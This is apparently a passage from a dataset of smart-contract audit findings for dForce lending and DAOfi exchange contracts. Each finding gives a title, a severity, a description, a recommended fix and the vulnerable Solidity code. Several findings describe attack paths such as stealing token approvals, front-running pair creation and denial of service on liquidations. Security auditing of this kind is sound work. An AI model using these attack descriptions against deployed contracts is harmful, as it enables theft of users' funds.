epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n\\nIf the claim amount is much lower than the coverage, the users are incentivized not to submit it and wait until the end of the coverage period to accumulate all the claims into one.чAllow the policyholders to submit multiple claims until the `coverTokens` is not reached.чч```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n -iETH.exchangeRateStored may not be accurate when invoked from external contractsчhighч`iETH.exchangeRateStored` returns the exchange rate of the contract as a function of the current cash of the contract. In the case of `iETH`, current cash is calculated as the contract's ETH balance minus msg.value:\\n```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n\\n`msg.value` is subtracted because the majority of `iETH` methods are payable, and `msg.value` is implicitly added to a contract's balance before execution begins. If `msg.value` were not subtracted, the value sent with a call could be used to inflate the contract's exchange rate artificially.\\nAs part of execution, `iETH` makes calls to the `Controller`, which performs important checks using (among other things) the stored exchange rate. When `exchangeRateStored` is invoked from the `Controller`, the call context has a `msg.value` of 0. However, the `msg.value` sent by the initial `iETH` execution is still included in the contract's balance. This means that the `Controller` receives an exchange rate inflated by the initial call's `msg.value`.\\nThis problem occurs in multiple locations in the Controller:\\n`beforeMint` uses the exchange rate to ensure the supply capacity of the market is not reached. In this case, inflation would prevent the entire supply capacity of the market from being utilized:\\n```\\n// Check the iToken's supply capacity, -1 means no limit\\nuint256 \\_totalSupplyUnderlying =\\n IERC20Upgradeable(\\_iToken).totalSupply().rmul(\\n IiToken(\\_iToken).exchangeRateStored()\\n );\\nrequire(\\n \\_totalSupplyUnderlying.add(\\_mintAmount) <= \\_market.supplyCapacity,\\n \"Token supply capacity reached\"\\n);\\n```\\n\\n`beforeLiquidateBorrow` uses the exchange rate via `calcAccountEquity` to calculate the value of the borrower's collateral. In this case, inflation would increase the account's equity, which could prevent the liquidator from liquidating:\\n```\\n(, uint256 \\_shortfall, , ) = calcAccountEquity(\\_borrower);\\n\\nrequire(\\_shortfall > 0, \"Account does not have shortfall\");\\n```\\nчResolution\\nThis issue was addressed in commit `9876e3a` by using a modifier to track the current `msg.value` of payable functions.\\nRather than having the `Controller` query the `iETH.exchangeRateStored`, the exchange rate could be passed-in to `Controller` methods as a parameter.\\nEnsure no other components in the system rely on `iETH.exchangeRateStored` after being called from `iETH`.чч```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n -Unbounded loop in Controller.calcAccountEquity allows DoS on liquidationчhighч`Controller.calcAccountEquity` calculates the relative value of a user's supplied collateral and their active borrow positions. Users may mark an arbitrary number of assets as collateral, and may borrow from an arbitrary number of assets. In order to calculate the value of both of these positions, this method performs two loops.\\nFirst, to calculate the sum of the value of a user's collateral:\\n```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n\\nSecond, to calculate the sum of the value of a user's borrow positions:\\n```\\n// Calculate all borrowed value\\n// borrowValue = underlyingPrice \\* underlyingBorrowed / borrowFactor\\n// sumBorrowed += borrowValue\\n\\_len = \\_accountData.borrowed.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.borrowed.at(i));\\n```\\n\\nFrom dForce, we learned that 200 or more assets would be supported by the Controller. This means that a user with active collateral and borrow positions on all 200 supported assets could force any `calcAccountEquity` action to perform some 400 iterations of these loops, each with several expensive external calls.\\nBy modifying dForce's unit test suite, we showed that an attacker could force the cost of `calcAccountEquity` above the block gas limit. This would prevent all of the following actions, as each relies on calcAccountEquity:\\n`iToken.transfer` and `iToken.transferFrom`\\n`iToken.redeem` and `iToken.redeemUnderlying`\\n`iToken.borrow`\\n`iToken.liquidateBorrow` and `iToken.seize`\\nThe following actions would still be possible:\\n`iToken.mint`\\n`iToken.repayBorrow` and `iToken.repayBorrowBehalf`\\nAs a result, an attacker may abuse the unbounded looping in `calcAccountEquity` to prevent the liquidation of underwater positions. We provided dForce with a PoC here: gist.чThere are many possible ways to address this issue. Some ideas have been outlined below, and it may be that a combination of these ideas is the best approach:\\nIn general, cap the number of markets and borrowed assets a user may have: The primary cause of the DoS is that the number of collateral and borrow positions held by a user is only restricted by the number of supported assets. The PoC provided above showed that somewhere around 150 collateral positions and 150 borrow positions, the gas costs of `calcAccountEquity` use most of the gas in a block. Given that gas prices often spike along with turbulent market conditions and that liquidations are far more likely in turbulent market conditions, a cap on active markets / borrows should be much lower than 150 each so as to keep the cost of liquidations as low as possible.\\ndForce should perform their own gas cost estimates to determine a cap, and choose a safe, low value. Estimates should be performed on the high-level `liquidateBorrow` method, so as to simulate an actual liquidation event. Additionally, estimates should factor in a changing block gas limit, and the possibility of opcode gas costs changing in future forks. It may be wise to make this cap configurable, so that the limits may be adjusted for future conditions.чч```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n -Fix utilization rate computation and respect reserves when lendingчmediumчThe utilization rate `UR` of an asset forms the basis for interest calculations and is defined as `borrows / ( borrows + cash - reserves)`.\\n```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n\\nThe implicit assumption here is that `reserves` <= cash; in this case — and if we define `UR` as `0` for `borrows == 0` — we have `0` <= `UR` <=1. We can view `cash` - `reserves` as “available cash”. However, the system does not guarantee that `reserves` never exceeds `cash`. If `reserves` > `cash` (and borrows + `cash` - `reserves` > 0), the formula for `UR` above gives a utilization rate above `1`. This doesn't make much sense conceptually and has undesirable technical consequences; an especially severe one is analyzed in issue 4.4.чIf `reserves > cash` — or, in other words, available cash is negative — this means part of the `reserves` have been borrowed, which ideally shouldn't happen in the first place. However, the `reserves` grow automatically over time, so it might be difficult to avoid this entirely. We recommend (1) avoiding this situation whenever it is possible and (2) fixing the `UR` computation such that it deals more gracefully with this scenario. More specifically:\\nLoan amounts should not be checked to be smaller than or equal to `cash` but `cash - reserves` (which might be negative). Note that the current check against `cash` happens more or less implicitly because the transfer just fails for insufficient `cash`.\\nMake the utilization rate computation return `1` if `reserves > cash` (unless borrows == `0`, in which case return `0` as is already the case).\\nRemark\\nInternally, the utilization rate and other fractional values are scaled by `1e18`. The discussion above has a more conceptual than technical perspective, so we used unscaled numbers. When making changes to the code, care must be taken to apply the scaling.чч```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n -If Base._updateInterest fails, the entire system will haltчmediumчBefore executing most methods, the `iETH` and `iToken` contracts update interest accumulated on borrows via the method `Base._updateInterest`. This method uses the contract's interest rate model to calculate the borrow interest rate. If the calculated value is above `maxBorrowRate` (0.001e18), the method will revert:\\n```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n \"\\_updateInterest: Borrow rate is too high!\"\\n );\\n```\\n\\nIf this method reverts, the entire contract may halt and be unrecoverable. The only ways to change the values used to calculate this interest rate lie in methods that must first call `Base._updateInterest`. In this case, those methods would fail.\\nOne other potential avenue for recovery exists: the Owner role may update the interest rate calculation contract via TokenAdmin._setInterestRateModel:\\n```\\n/\\*\\*\\n \\* @dev Sets a new interest rate model.\\n \\* @param \\_newInterestRateModel The new interest rate model.\\n \\*/\\nfunction \\_setInterestRateModel(\\n IInterestRateModelInterface \\_newInterestRateModel\\n) external virtual onlyOwner settleInterest {\\n // Gets current interest rate model.\\n IInterestRateModelInterface \\_oldInterestRateModel = interestRateModel;\\n\\n // Ensures the input address is the interest model contract.\\n require(\\n \\_newInterestRateModel.isInterestRateModel(),\\n \"\\_setInterestRateModel: This is not the rate model contract!\"\\n );\\n\\n // Set to the new interest rate model.\\n interestRateModel = \\_newInterestRateModel;\\n```\\n\\nHowever, this method also calls `Base._updateInterest` before completing the upgrade, so it would fail as well.\\nWe used interest rate parameters taken from dForce's unit tests to determine whether any of the interest rate models could return a borrow rate that would cause this failure. The default `InterestRateModel` is deployed using these values:\\n```\\nbaseInterestPerBlock: 0\\ninterestPerBlock: 5.074e10\\nhighInterestPerBlock: 4.756e11\\nhigh: 0.75e18\\n```\\n\\nPlugging these values in to their borrow rate calculations, we determined that the utilization rate of the contract would need to be `2103e18` in order to reach the max borrow rate and trigger a failure. Plugging this in to the formula for utilization rate, we derived the following ratio:\\n`reserves >= (2102/2103)*borrows + cash`\\nWith the given interest rate parameters, if token reserves, total borrows, and underlying cash meet the above ratio, the interest rate model would return a borrow rate above the maximum, leading to the failure conditions described above.чNote that the examples above depend on the specific interest rate parameters configured by dForce. In general, with reasonable interest rate parameters and a reasonable reserve ratio, it seems unlikely that the maximum borrow rate will be reached. Consider implementing the following changes as a precaution:\\nAs utilization rate should be between `0` and `1` (scaled by 1e18), prevent utilization rate calculations from returning anything above `1e18`. See issue 4.3 for a more thorough discussion of this topic.\\nRemove the `settleInterest` modifier from TokenAdmin._setInterestRateModel: In a worst case scenario, this will allow the Owner role to update the interest rate model without triggering the failure in `Base._updateInterest`.чч```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n \"\\_updateInterest: Borrow rate is too high!\"\\n );\\n```\\n -RewardDistributor requirement prevents transition of Owner role to smart contractчmediumчFrom dForce, we learned that the eventual plan for the system Owner role is to use a smart contract (a multisig or DAO). However, a requirement in `RewardDistributor` would prevent the `onlyOwner` method `_setDistributionFactors` from working in this case.\\n`_setDistributionFactors` calls `updateDistributionSpeed`, which requires that the caller is an EOA:\\n```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, \"only EOA can update speeds\");\\n require(!paused, \"Can not update speeds when paused\");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n\\nIn the event the Owner role is a smart contract, this statement would necessitate a complicated upgrade to restore full functionality.чRather than invoking `updateDistributionSpeed`, have `_setDistributionFactors` directly call the internal helper `_updateDistributionSpeed`, which does not require the caller is an EOA.чч```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, \"only EOA can update speeds\");\\n require(!paused, \"Can not update speeds when paused\");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n -MSDController._withdrawReserves does not update interest before withdrawalчmediumч`MSDController._withdrawReserves` allows the Owner to mint the difference between an MSD asset's accumulated debt and earnings:\\n```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, \"Token do not have enough reserve\");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n\\nDebt and earnings are updated each time the asset's `iMSD` and `MSDS` contracts are used for the first time in a given block. Because `_withdrawReserves` does not force an update to these values, it is possible for the withdrawal amount to be calculated using stale values.чEnsure `_withdrawReserves` invokes `iMSD.updateInterest()` and `MSDS.updateInterest()`.чч```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, \"Token do not have enough reserve\");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n -permit functions use deployment-time instead of execution-time chain IDчlowчThe contracts `Base`, `MSD`, and `MSDS` each have an EIP-2612-style `permit` function that supports approvals with EIP-712 signatures. We focus this discussion on the `Base` contract, but the same applies to `MSD` and `MSDS`.\\nWhen the contract is initialized, the chain ID is queried (with the `CHAINID` opcode) and becomes part of the `DOMAIN_SEPARATOR` — a hash of several values which (presumably) don't change over the lifetime of the contract and that can therefore be computed only once, when the contract is deployed.\\n```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n \"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\"\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(\"1\")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n\\nThe `DOMAIN_SEPARATOR` is supposed to prevent replay attacks by providing context for the signature; it is hashed into the digest to be signed.\\n```\\nbytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR,\\n keccak256(\\n abi.encode(\\n PERMIT\\_TYPEHASH,\\n \\_owner,\\n \\_spender,\\n \\_value,\\n \\_currentNonce,\\n \\_deadline\\n )\\n )\\n )\\n );\\naddress \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\nrequire(\\n \\_recoveredAddress != address(0) && \\_recoveredAddress == \\_owner,\\n \"permit: INVALID\\_SIGNATURE!\"\\n);\\n```\\n\\nThe chain ID is not necessarily constant, though. In the event of a chain split, only one of the resulting chains gets to keep the original chain ID and the other will have to use a new one. With the current pattern, a signature will be valid on both chains; if the `DOMAIN_SEPARATOR` is recomputed for every verification, a signature will only be valid on the chain that keeps the original ID — which is probably the intended behavior.\\nRemark\\nThe reason why the not necessarily constant chain ID is part of the supposedly constant `DOMAIN_SEPARATOR` is that EIP-712 predates the introduction of the `CHAINID` opcode. Originally, it was not possible to query the chain ID via opcode, so it had to be supplied to the constructor of a contract by the deployment script.чAn obvious fix is to compute the `DOMAIN_SEPARATOR` dynamically in `permit`. However, since a chain split is a relatively unlikely event, it makes sense to compute the `DOMAIN_SEPARATOR` at deployment/initialization time and then check in `permit` whether the current chain ID equals the one that went into the `DOMAIN_SEPARATOR`. If that is true, we proceed as before. If the chain ID has changed, we could (1) just revert, or (2) recompute the `DOMAIN_SEPARATOR` with the new chain ID. Solution (1) is probably the easiest and most straightforward to implement, but it should be noted that it makes the `permit` functionality of this contract completely unusable on the new chain.чч```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n \"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\"\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(\"1\")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n -iETH.receive() does not support contracts executing during their constructorчlowч`iETH.receive()` requires that the caller is a contract:\\n```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n \"receive: Only can call from a contract!\"\\n );\\n}\\n```\\n\\nThis method uses the `extcodesize` of an account to check that the account belongs to a contract. However, contracts currently executing their constructor will have an `extcodesize` of 0, and will not be able to use this method.\\nThis is unlikely to cause significant issues, but dForce may want to consider supporting this edge case.чUse `msg.sender != tx.origin` as a more reliable method to detect use by a contract.чч```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n \"receive: Only can call from a contract!\"\\n );\\n}\\n```\\n -Token approvals can be stolen in DAOfiV1Router01.addLiquidity()чhighч`DAOfiV1Router01.addLiquidity()` creates the desired pair contract if it does not already exist, then transfers tokens into the pair and calls `DAOfiV1Pair.deposit()`. There is no validation of the address to transfer tokens from, so an attacker could pass in any address with nonzero token approvals to `DAOfiV1Router`. This could be used to add liquidity to a pair contract for which the attacker is the `pairOwner`, allowing the stolen funds to be retrieved using `DAOfiV1Pair.withdraw()`.\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\nчTransfer tokens from `msg.sender` instead of `lp.sender`.чч```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n -The deposit of a new pair can be stolenчhighчTo create a new pair, a user is expected to call the same `addLiquidity()` (or the addLiquidityETH()) function of the router contract seen above:\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n\\nThis function checks if the pair already exists and creates a new one if it does not. After that, the first and only deposit is made to that pair.\\nThe attacker can front-run that call and create a pair with the same parameters (thus, with the same address) by calling the `createPair` function of the `DAOfiV1Factory` contract. By calling that function directly, the attacker does not have to make the deposit when creating a new pair. The initial user will make this deposit, whose funds can now be withdrawn by the attacker.чThere are a few factors/bugs that allowed this attack. All or some of them should be fixed:\\nThe `createPair` function of the `DAOfiV1Factory` contract can be called directly by anyone without depositing with any `router` address as the parameter. The solution could be to allow only the `router` to create a pair.\\nThe `addLiquidity` function checks that the pair does not exist yet. If the pair exists already, a deposit should only be made by the owner of the pair. But in general, a new pair shouldn't be deployed without depositing in the same transaction.\\nThe pair's address does not depend on the owner/creator. It might make sense to add that information to the salt.чч```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n -Incorrect token decimal conversions can lead to loss of fundsчhighчThe `_convert()` function in `DAOfiV1Pair` is used to accommodate tokens with varying `decimals()` values. There are three cases in which it implicitly returns 0 for any `amount`, the most notable of which is when `token.decimals() == resolution`.\\nAs a result of this, `getQuoteOut()` reverts any time either `baseToken` or `quoteToken` have `decimals == INTERNAL_DECIMALS` (currently hardcoded to 8).\\n`getBaseOut()` also reverts in most cases when either `baseToken` or `quoteToken` have `decimals() == INTERNAL_DECIMALS`. The exception is when `getBaseOut()` is called while `supply` is 0, as is the case in `deposit()`. This causes `getBaseOut()` to succeed, returning an incorrect value.\\nThe result of this is that no swaps can be performed in one of these pools, and the `deposit()` function will return an incorrect `amountBaseOut` of `baseToken` to the depositor, the balance of which can then be withdrawn by the `pairOwner`.\\n```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\nчThe `_convert()` function should return `amount` when `token.decimals() == resolution`. Additionally, implicit return values should be avoided whenever possible, especially in functions that implement complex mathematical operations.\\n`BancorFormula.power(baseN, baseD, _, _)` does not support `baseN < baseD`, and checks should be added to ensure that any call to the `BancorFormula` conforms to the expected input ranges.чч```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n -The swapExactTokensForETH checks the wrong return valueчhighчThe following lines are intended to check that the amount of tokens received from a swap is greater than the minimum amount expected from this swap (sp.amountOut):\\n```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n\\nInstead, it calculates the difference between the initial receiver's balance and the balance of the router.чCheck the intended value.чч```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n -DAOfiV1Pair.deposit() accepts deposits of zero, blocking the poolчmediumч`DAOfiV1Pair.deposit()` is used to deposit liquidity into the pool. Only a single deposit can be made, so no liquidity can ever be added to a pool where `deposited == true`. The `deposit()` function does not check for a nonzero deposit amount in either token, so a malicious user that does not hold any of the `baseToken` or `quoteToken` can lock the pool by calling `deposit()` without first transferring any funds to the pool.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\nчRequire a minimum deposit amount in both `baseToken` and `quoteToken`, and do not rely on any assumptions about the distribution of `baseToken` as part of the security model.чч```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if 